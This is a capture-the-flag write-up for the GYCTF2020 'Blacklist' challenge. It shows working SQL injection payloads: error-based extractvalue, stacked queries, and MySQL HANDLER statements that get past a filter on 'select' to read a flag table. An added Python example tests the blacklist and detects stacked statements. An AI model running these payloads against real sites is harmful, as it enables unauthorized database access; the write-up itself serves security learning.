[GYCTF2020]Blacklist

2022-06-23 09:19:00 K00sec

The title tells you directly that a blacklist has to be bypassed. Looking at the input field, it feels like a command is being executed.

After testing, it is clear that no command is being executed; this is SQL injection. An error message is returned, so try error-based injection.

Error-based injection returns the current database name. Next, try to dump the table names.

# payload
?inject=0'-extractvalue(1,(concat('~',database())))+%23

The attempt to dump the table names is filtered; I waited, and the filtered keywords were displayed.

The select keyword is filtered, but the semicolon (;) is not, so stacked injection is worth a try.

# payload
?inject=0';show+databases;show+tables;%23

The stacked injection succeeds, listing the databases and the tables in the current database. The flag should be in the FlagHere table.

# payload
?inject=0';show+columns+from+FlagHere;%23

But how can the data be read when select is filtered? Baidu comes through again; you can find anything you want there.

# HANDLER statement
HANDLER tbl_name OPEN [ [AS] alias]
[
	HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
	HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
	HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
]
HANDLER table_name OPEN: opens a table handle.
HANDLER table_name READ index: reads the table through an index.
HANDLER table_name CLOSE: closes the open handle.

# 1. Query through a specified index
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]

# 2. Traverse the table through an index
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
# FIRST: get the first row (the row with the smallest index value)
# NEXT: get the next row
# PREV: get the previous row
# LAST: get the last row (the row with the largest index value)

# 3. View the table without an index
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

# READ FIRST: get the first row of the handle
# READ NEXT: get the remaining rows one at a time

# Executing READ NEXT after the last row returns an empty result


##  Complete example 
###  View the table through the specified index 
mysql> HANDLER test_table OPEN;HANDLER test_table READ test_index=(4);HANDLER test_table CLOSE;
Query OK, 0 rows affected (0.00 sec)

+------+------+
| id   | name |
+------+------+
|    4 |      |
+------+------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)

###  View table by index 
mysql> HANDLER test_table OPEN;HANDLER test_table READ FIRST;HANDLER test_table CLOSE;
Query OK, 0 rows affected (0.00 sec)

+------+------+
| id   | name |
+------+------+
|    3 |      |
+------+------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)

###  View the table by getting the next row of the index in turn 

mysql> HANDLER test_table OPEN;HANDLER test_table READ NEXT;
Query OK, 0 rows affected (0.00 sec)

+------+------+
| id   | name |
+------+------+
|    3 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    4 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    5 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    1 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    2 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
Empty set (0.00 sec)
													 
#### Finally, reading past the end of the table returns an empty result

Use the HANDLER statement to read the flag.

# payload
?inject=0';HANDLER+FlagHere+OPEN;HANDLER+FlagHere+READ+NEXT;HANDLER+FlagHere+CLOSE;%23
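
An added example, not part of the original write-up: a Python check of why a keyword blacklist lets the payloads above through, beside a strict allow-list check and a log-review helper that flags stacked statements. The blacklist contents (other than select), the function names and the 10-digit id limit are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical blacklist. The page only confirms that "select" is filtered;
# the remaining keywords are assumptions made for this example.
BLACKLIST = re.compile(r"select|update|delete|insert|drop|where", re.IGNORECASE)

# Values of the inject parameter exactly as they appear in the write-up.
PAGE_PAYLOADS = [
    "0'-extractvalue(1,(concat('~',database())))+%23",
    "0';show+columns+from+FlagHere;%23",
    "0';HANDLER+FlagHere+OPEN;HANDLER+FlagHere+READ+NEXT;HANDLER+FlagHere+CLOSE;%23",
]


def blacklist_allows(raw):
    """Keyword filter: accept anything that contains no listed keyword."""
    return BLACKLIST.search(unquote_plus(raw)) is None


def allowlist_accepts(raw):
    """Hardened check: the parameter must be a plain decimal id, nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", unquote_plus(raw)) is not None


def stacked_verbs(raw):
    """Detection helper for log review: leading keyword of every statement
    that follows a ';' in the decoded parameter (empty list = not stacked)."""
    decoded = unquote_plus(raw).split("#", 1)[0]  # drop trailing MySQL comment
    verbs = []
    for stmt in decoded.split(";")[1:]:
        match = re.match(r"\s*([A-Za-z]+)", stmt)
        if match:
            verbs.append(match.group(1).upper())
    return verbs


def audit(payloads):
    """Return (blacklist verdict, allow-list verdict, stacked verbs) per payload."""
    return [(blacklist_allows(p), allowlist_accepts(p), stacked_verbs(p))
            for p in payloads]


if __name__ == "__main__":
    for payload, row in zip(PAGE_PAYLOADS, audit(PAGE_PAYLOADS)):
        print(row, payload)
```

Input validation is one layer only; the underlying fix is a parameterized query sent through a client call that does not execute multiple statements.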
